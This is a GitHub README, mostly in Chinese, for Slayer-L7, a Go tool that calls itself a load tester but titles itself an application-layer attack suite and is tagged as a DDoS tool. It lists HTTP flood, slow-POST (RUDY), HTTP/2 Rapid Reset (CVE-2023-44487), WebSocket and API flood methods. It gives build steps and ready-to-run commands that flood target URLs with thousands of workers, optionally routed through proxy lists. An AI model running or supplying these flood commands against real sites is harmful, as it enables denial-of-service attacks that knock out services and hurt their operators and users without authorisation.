Syn2Much/Slayer-L7
GitHub: Syn2Much/Slayer-L7
Slayer-L7 是一个用 Go 编写的高性能应用层压力测试工具,支持多种 HTTP/S 流量模拟方法和大规模并发。
Stars: 25 | Forks: 6
# ⚔️ Slayer 7 - 应用层攻击套件
## 方法
| 方法 | 描述 |
| ------------ | ------------------------------------------------------------ |
| `httpget` | 标准 HTTP GET 泛洪 |
| `httppost` | 带有随机 form / JSON payload 的 HTTP POST |
| `rudy` | 慢速 POST — 巨大的 `Content-Length`,缓慢发送字节 |
| `apiflood` | 带有随机 endpoint 和嵌套 payload 的 JSON API 泛洪 |
| `rapidreset` | HTTP/2 Rapid Reset (CVE-2023-44487) |
| `wsflood` | 带有混合流量的 WebSocket 连接泛洪 |
## 安装说明
### 前置条件
* **Go 1.21+**
### 快速设置
```
git clone https://github.com/Syn2Much/Slayer-L7.git
cd Slayer-L7
go mod tidy
go build -o slayer .
```
## 用法
```
slayer -t [-m method] [-w workers] [-d duration] [-p proxyfile] [-v] [-r ms]
```
### Flags
| Flag | 默认值 | 描述 |
| ---- | ------------ | --------------------------------------- |
| `-t` | *(必填)* | 目标 URL (例如 `https://example.com`) |
| `-m` | `httpget` | 攻击方法 |
| `-w` | `2048` | 并发 worker 数量 |
| `-d` | `30` | 持续时间(秒) |
| `-p` | *(无)* | Proxy 文件路径(省略以使用直连模式) |
| `-v` | `false` | 将请求错误打印到 stderr |
| `-r` | `0` | 每个 worker 请求之间的延迟(毫秒)(0 = 无限) |
### 依赖
```
github.com/gorilla/websocket
golang.org/x/net/http2
golang.org/x/net/http2/hpack
```
## 示例
```
# 基础 GET flood (60秒)
./slayer -t https://target.com -m httpget -d 60
# 通过 proxies 进行 POST flood (4096 个 workers)
./slayer -t https://target.com -m httppost -w 4096 -d 120 -p proxies.txt
# RUDY 慢速 POST
./slayer -t https://target.com -m rudy -w 500 -d 300
# 通过 proxies 进行 HTTP/2 Rapid Reset
./slayer -t https://target.com -m rapidreset -w 1024 -p proxies.txt
# WebSocket flood
./slayer -t https://target.com -m wsflood -w 2048 -d 60
# API JSON flood
./slayer -t https://target.com -m apiflood -w 2048 -d 90
# 速率受限的 GET flood (跨 10 个 workers 最大约 100 RPS)
./slayer -t https://target.com -m httpget -w 10 -d 60 -r 100
# Verbose 模式 — 运行时将错误打印到 stderr
./slayer -t https://target.com -m httpget -d 30 -v
```
## Proxy 文件格式
每行一个 proxy。
支持带有可选身份验证的 HTTP / HTTPS / SOCKS5。
```
http://proxy1.example.com:8080
http://user:pass@proxy2.example.com:3128
socks5://proxy3.example.com:1080
```
## 👤 作者
**Syn2Much**
[](mailto:hell@sinnners.city)
[](https://x.com/synacket)
标签:CC攻击, DDoS攻击, EVTX分析, Golang, 安全编程, 应用层攻击, 日志审计, 网络压测, 配置错误